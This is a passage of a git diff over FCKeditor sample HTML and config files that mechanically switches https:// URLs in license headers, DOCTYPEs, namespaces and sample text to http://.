document.location.pathname.substring(0,document.location.pathnam var oFCKeditor = new FCKeditor( 'FCKeditor1' ) ; oFCKeditor.BasePath = sBasePath ; oFCKeditor.Height = 300 ; -oFCKeditor.Value = 'This is some <strong>sample text<\/strong>. You are using <a href="https://www.fckeditor.net/">FCKeditor<\/a>.' ; +oFCKeditor.Value = 'This is some <strong>sample text<\/strong>. You are using <a href="http://www.fckeditor.net/">FCKeditor<\/a>.' ; oFCKeditor.Create() ; //--> </script> diff --git a/admin/FCKeditor/_samples/html/sample02.html b/admin/FCKeditor/_samples/html/sample02.html index d0257f3..b19f214 100755 --- a/admin/FCKeditor/_samples/html/sample02.html +++ b/admin/FCKeditor/_samples/html/sample02.html @@ -1,6 +1,6 @@ -<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,19 +9,19 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * Sample page. --> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FCKeditor - Sample</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> @@ -54,7 +54,7 @@ window.onload = function() <hr /> <form action="sampleposteddata.asp" method="post" target="_blank"> <div> - <textarea name="FCKeditor1" rows="10" cols="80" style="width: 100%; height: 200px">This is some <strong>sample text</strong>. You are using <a href="https://www.fckeditor.net/">FCKeditor</a>.</textarea> + <textarea name="FCKeditor1" rows="10" cols="80" style="width: 100%; height: 200px">This is some <strong>sample text</strong>. You are using <a href="http://www.fckeditor.net/">FCKeditor</a>.</textarea> </div> <br /> <input type="submit" value="Submit" /> diff --git a/admin/FCKeditor/_samples/html/sample03.html b/admin/FCKeditor/_samples/html/sample03.html index 1bf9a94..5583a39 100755 --- a/admin/FCKeditor/_samples/html/sample03.html +++ b/admin/FCKeditor/_samples/html/sample03.html @@ -1,6 +1,6 @@ -<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,19 +9,19 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * Sample page. --> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FCKeditor - Sample</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> @@ -125,7 +125,7 @@ else oFCKeditor.Config["AutoDetectLanguage"] = false ; oFCKeditor.Config["DefaultLanguage"] = sLang ; } -oFCKeditor.Value = 'This is some <strong>sample text</strong>. You are using <a href="https://www.fckeditor.net/">FCKeditor</a>.' ; +oFCKeditor.Value = 'This is some <strong>sample text</strong>. You are using <a href="http://www.fckeditor.net/">FCKeditor</a>.' ; oFCKeditor.Create() ; //--> </script> diff --git a/admin/FCKeditor/_samples/html/sample04.html b/admin/FCKeditor/_samples/html/sample04.html index 0019910..9a72cbc 100755 --- a/admin/FCKeditor/_samples/html/sample04.html +++ b/admin/FCKeditor/_samples/html/sample04.html @@ -1,6 +1,6 @@ -<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,19 +9,19 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * Sample page. --> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FCKeditor - Sample</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> @@ -84,7 +84,7 @@ oFCKeditor.BasePath = sBasePath ; if ( sToolbar != null ) oFCKeditor.ToolbarSet = sToolbar ; -oFCKeditor.Value = 'This is some <strong>sample text</strong>. You are using <a href="https://www.fckeditor.net/">FCKeditor</a>.' ; +oFCKeditor.Value = 'This is some <strong>sample text</strong>. You are using <a href="http://www.fckeditor.net/">FCKeditor</a>.' ; oFCKeditor.Create() ; //--> </script> diff --git a/admin/FCKeditor/_samples/html/sample05.html b/admin/FCKeditor/_samples/html/sample05.html index 7d69895..a917032 100755 --- a/admin/FCKeditor/_samples/html/sample05.html +++ b/admin/FCKeditor/_samples/html/sample05.html @@ -1,6 +1,6 @@ -<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,19 +9,19 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * Sample page. --> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FCKeditor - Sample</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> @@ -114,7 +114,7 @@ if ( sSkin != null ) } } -oFCKeditor.Value = 'This is some <strong>sample text</strong>. You are using <a href="https://www.fckeditor.net/">FCKeditor</a>.' ; +oFCKeditor.Value = 'This is some <strong>sample text</strong>. You are using <a href="http://www.fckeditor.net/">FCKeditor</a>.' ; oFCKeditor.Create() ; //--> </script> diff --git a/admin/FCKeditor/_samples/html/sample06.config.js b/admin/FCKeditor/_samples/html/sample06.config.js index 29f2fba..4d45b72 100755 --- a/admin/FCKeditor/_samples/html/sample06.config.js +++ b/admin/FCKeditor/_samples/html/sample06.config.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/_samples/html/sample06.html b/admin/FCKeditor/_samples/html/sample06.html index 1d23326..85f24ae 100755 --- a/admin/FCKeditor/_samples/html/sample06.html +++ b/admin/FCKeditor/_samples/html/sample06.html @@ -1,6 +1,6 @@ -<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,19 +9,19 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * Sample page. --> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FCKeditor - Sample</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> @@ -62,7 +62,7 @@ oFCKeditor.Config['CustomConfigurationsPath'] = sBasePath + '_samples/html/sampl // Let's use a custom toolbar for this sample. oFCKeditor.ToolbarSet = 'PluginTest' ; -oFCKeditor.Value = 'This is some <strong>sample text</strong>. You are using <a href="https://www.fckeditor.net/">FCKeditor</a>.' ; +oFCKeditor.Value = 'This is some <strong>sample text</strong>. You are using <a href="http://www.fckeditor.net/">FCKeditor</a>.' ; oFCKeditor.Create() ; //--> </script> diff --git a/admin/FCKeditor/_samples/html/sample07.html b/admin/FCKeditor/_samples/html/sample07.html index a19431d..0f7237c 100755 --- a/admin/FCKeditor/_samples/html/sample07.html +++ b/admin/FCKeditor/_samples/html/sample07.html @@ -1,6 +1,6 @@ -<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,19 +9,19 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * Sample page. --> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FCKeditor - Sample</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> @@ -48,7 +48,7 @@ var sBasePath = document.location.pathname.substring(0,document.location.pathnam var oFCKeditor = new FCKeditor( 'FCKeditor1' ) ; oFCKeditor.BasePath = sBasePath ; oFCKeditor.Config['FullPage'] = true ; -oFCKeditor.Value = '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Full Page Test</title><meta content="text/html; charset=utf-8" http-equiv="Content-Type"/></head><body>This is some <strong>sample text</strong>. You are using <a href="https://www.fckeditor.net/">FCKeditor</a>.</body></html>' ; +oFCKeditor.Value = '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Full Page Test</title><meta content="text/html; charset=utf-8" http-equiv="Content-Type"/></head><body>This is some <strong>sample text</strong>. You are using <a href="http://www.fckeditor.net/">FCKeditor</a>.</body></html>' ; oFCKeditor.Create() ; //--> </script> diff --git a/admin/FCKeditor/_samples/html/sample08.html b/admin/FCKeditor/_samples/html/sample08.html index 93b4fd0..8e09431 100755 --- a/admin/FCKeditor/_samples/html/sample08.html +++ b/admin/FCKeditor/_samples/html/sample08.html @@ -1,6 +1,6 @@ -<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,19 +9,19 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * Sample page. --> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FCKeditor - Sample</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> @@ -158,7 +158,7 @@ var sBasePath = document.location.pathname.substring(0,document.location.pathnam var oFCKeditor = new FCKeditor( 'FCKeditor1' ) ; oFCKeditor.BasePath = sBasePath ; -oFCKeditor.Value = 'This is some <strong>sample text</strong>. You are using <a href="https://www.fckeditor.net/">FCKeditor</a>.' ; +oFCKeditor.Value = 'This is some <strong>sample text</strong>. You are using <a href="http://www.fckeditor.net/">FCKeditor</a>.' ; oFCKeditor.Create() ; //--> </script> diff --git a/admin/FCKeditor/_samples/html/sample09.html b/admin/FCKeditor/_samples/html/sample09.html index 512f8e8..ed4467a 100755 --- a/admin/FCKeditor/_samples/html/sample09.html +++ b/admin/FCKeditor/_samples/html/sample09.html @@ -1,6 +1,6 @@ -<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,19 +9,19 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * Sample page. --> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FCKeditor - Sample</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> @@ -76,7 +76,7 @@ oFCKeditor.Config['ToolbarStartExpanded'] = false ; oFCKeditor.BasePath = sBasePath ; oFCKeditor.ToolbarSet = 'Basic' ; -oFCKeditor.Value = 'This is some <strong>sample text</strong>. You are using <a href="https://www.fckeditor.net/">FCKeditor</a>.' ; +oFCKeditor.Value = 'This is some <strong>sample text</strong>. You are using <a href="http://www.fckeditor.net/">FCKeditor</a>.' ; oFCKeditor.Create() ; //--> </script> @@ -89,7 +89,7 @@ oFCKeditor = new FCKeditor( 'FCKeditor_Default' ) ; oFCKeditor.Config['ToolbarStartExpanded'] = false ; oFCKeditor.BasePath = sBasePath ; -oFCKeditor.Value = 'This is some <strong>sample text</strong>. You are using <a href="https://www.fckeditor.net/">FCKeditor</a>.' ; +oFCKeditor.Value = 'This is some <strong>sample text</strong>. You are using <a href="http://www.fckeditor.net/">FCKeditor</a>.' ; oFCKeditor.Create() ; //--> </script> diff --git a/admin/FCKeditor/_samples/html/sample10.html b/admin/FCKeditor/_samples/html/sample10.html index 19cc6fa..bcfcb73 100755 --- a/admin/FCKeditor/_samples/html/sample10.html +++ b/admin/FCKeditor/_samples/html/sample10.html @@ -1,6 +1,6 @@ -<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,19 +9,19 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * Sample page. --> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FCKeditor - Sample</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> @@ -56,7 +56,7 @@ var oFCKeditor = new FCKeditor( 'FCKeditor_1' ) ; oFCKeditor.BasePath = sBasePath ; oFCKeditor.Height = 100 ; oFCKeditor.Config[ 'ToolbarLocation' ] = 'Out:xToolbar' ; -oFCKeditor.Value = 'This is some <strong>sample text</strong>. You are using <a href="https://www.fckeditor.net/">FCKeditor</a>.' ; +oFCKeditor.Value = 'This is some <strong>sample text</strong>. You are using <a href="http://www.fckeditor.net/">FCKeditor</a>.' ; oFCKeditor.Create() ; //--> </script> @@ -68,7 +68,7 @@ oFCKeditor = new FCKeditor( 'FCKeditor_2' ) ; oFCKeditor.BasePath = sBasePath ; oFCKeditor.Height = 100 ; oFCKeditor.Config[ 'ToolbarLocation' ] = 'Out:xToolbar' ; -oFCKeditor.Value = 'This is some <strong>sample text</strong>. You are using <a href="https://www.fckeditor.net/">FCKeditor</a>.' ; +oFCKeditor.Value = 'This is some <strong>sample text</strong>. You are using <a href="http://www.fckeditor.net/">FCKeditor</a>.' ; oFCKeditor.Create() ; //--> </script> diff --git a/admin/FCKeditor/_samples/html/sample11.html b/admin/FCKeditor/_samples/html/sample11.html index d205c92..dae8b81 100755 --- a/admin/FCKeditor/_samples/html/sample11.html +++ b/admin/FCKeditor/_samples/html/sample11.html @@ -1,6 +1,6 @@ -<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,19 +9,19 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * Sample page. --> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FCKeditor - Sample</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> diff --git a/admin/FCKeditor/_samples/html/sample11_frame.html b/admin/FCKeditor/_samples/html/sample11_frame.html index 77d2d9c..692ccd4 100755 --- a/admin/FCKeditor/_samples/html/sample11_frame.html +++ b/admin/FCKeditor/_samples/html/sample11_frame.html @@ -1,5 +1,5 @@ <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,19 +8,19 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * Sample page. --> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FCKeditor - Sample</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> @@ -46,7 +46,7 @@ var oFCKeditor = new FCKeditor( 'FCKeditor_1' ) ; oFCKeditor.BasePath = sBasePath ; oFCKeditor.Height = 100 ; oFCKeditor.Config[ 'ToolbarLocation' ] = 'Out:parent(xToolbar)' ; -oFCKeditor.Value = 'This is some <strong>sample text</strong>. You are using <a href="https://www.fckeditor.net/">FCKeditor</a>.' ; +oFCKeditor.Value = 'This is some <strong>sample text</strong>. You are using <a href="http://www.fckeditor.net/">FCKeditor</a>.' ; oFCKeditor.Create() ; //--> </script> @@ -58,7 +58,7 @@ oFCKeditor = new FCKeditor( 'FCKeditor_2' ) ; oFCKeditor.BasePath = sBasePath ; oFCKeditor.Height = 100 ; oFCKeditor.Config[ 'ToolbarLocation' ] = 'Out:parent(xToolbar)' ; -oFCKeditor.Value = 'This is some <strong>sample text</strong>. You are using <a href="https://www.fckeditor.net/">FCKeditor</a>.' ; +oFCKeditor.Value = 'This is some <strong>sample text</strong>. You are using <a href="http://www.fckeditor.net/">FCKeditor</a>.' ; oFCKeditor.Create() ; //--> </script> diff --git a/admin/FCKeditor/_samples/html/sample12.html b/admin/FCKeditor/_samples/html/sample12.html index 6bb9e6f..2779292 100755 --- a/admin/FCKeditor/_samples/html/sample12.html +++ b/admin/FCKeditor/_samples/html/sample12.html @@ -1,6 +1,6 @@ -<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,19 +9,19 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * Sample page. --> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FCKeditor - Sample</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> @@ -103,7 +103,7 @@ if ( document.location.search.length > 1 ) // Create the FCKeditor instance. var oFCKeditor = new FCKeditor( 'FCKeditor1' ) ; oFCKeditor.BasePath = sBasePath ; -oFCKeditor.Value = 'This is some <strong>sample text</strong>. You are using <a href="https://www.fckeditor.net/">FCKeditor</a>.' ; +oFCKeditor.Value = 'This is some <strong>sample text</strong>. You are using <a href="http://www.fckeditor.net/">FCKeditor</a>.' ; // Enable the Enter Key Handler. This feature will not be available in the release version. oFCKeditor.Config["DisableEnterKeyHandler"] = false ; diff --git a/admin/FCKeditor/_samples/html/sample13.html b/admin/FCKeditor/_samples/html/sample13.html index e54c606..c33f853 100755 --- a/admin/FCKeditor/_samples/html/sample13.html +++ b/admin/FCKeditor/_samples/html/sample13.html @@ -1,6 +1,6 @@ -<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,19 +9,19 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * Sample page. --> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FCKeditor - Sample</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> @@ -130,7 +130,7 @@ function PrepareSave() <input type="button" value="Switch to FCKeditor" onclick="Toggle()" /> <br /> <br /> - <textarea id="_DataTextarea" name="Data" cols="80" rows="20" style="width: 95%">This is some <strong>sample text</strong>. You are using <a href="https://www.fckeditor.net/">FCKeditor</a>.</textarea> + <textarea id="_DataTextarea" name="Data" cols="80" rows="20" style="width: 95%">This is some <strong>sample text</strong>. You are using <a href="http://www.fckeditor.net/">FCKeditor</a>.</textarea> </div> <div id="_FCKeditor" style="display: none"> <!-- Note that the following button is disabled at startup. diff --git a/admin/FCKeditor/_samples/html/sampleposteddata.asp b/admin/FCKeditor/_samples/html/sampleposteddata.asp index acbc8c6..5bfa29f 100755 --- a/admin/FCKeditor/_samples/html/sampleposteddata.asp +++ b/admin/FCKeditor/_samples/html/sampleposteddata.asp @@ -1,6 +1,6 @@ -<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,19 +9,19 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * 